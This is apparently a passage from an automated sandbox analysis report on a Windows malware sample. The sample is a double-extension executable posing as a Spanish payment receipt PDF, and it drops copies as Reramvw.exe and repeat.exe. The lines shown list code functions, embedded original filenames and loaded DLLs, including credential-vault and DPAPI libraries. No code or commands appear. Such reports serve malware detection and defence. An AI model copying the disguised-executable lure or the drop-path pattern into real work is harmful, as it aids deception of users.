                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_0657004012_2_06570040
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_0657C1A012_2_0657C1A0
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_0657FC3012_2_0657FC30
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_0657DA2012_2_0657DA20
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_0659CE6012_2_0659CE60
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_06593F5812_2_06593F58
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_065984B212_2_065984B2
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_06592B0012_2_06592B00
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_065993F812_2_065993F8
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_0659004012_2_06590040
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_0659501012_2_06595010
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_0659AE4812_2_0659AE48
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_0659325812_2_06593258
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_0659A1C012_2_0659A1C0
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1994031203.0000000006410000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEjhrxhh.exe" vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1994246590.0000000006430000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNnemtwpsj.dll" vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000043C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameecc3eab7-e292-410a-b454-1bd1e0e2e768.exe4 vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.0000000004172000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNnemtwpsj.dll" vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1991439502.00000000011DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.0000000003291000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameecc3eab7-e292-410a-b454-1bd1e0e2e768.exe4 vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000000.1960195835.0000000000C52000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEjhrxhh.exe" vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.00000000030FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameecc3eab7-e292-410a-b454-1bd1e0e2e768.exe4 vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206382478.0000000000EF9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exeBinary or memory string: OriginalFilenameEjhrxhh.exe" vs JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: vaultcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: vaultcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: vaultcli.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeSection loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeSection loaded: cryptbase.dll
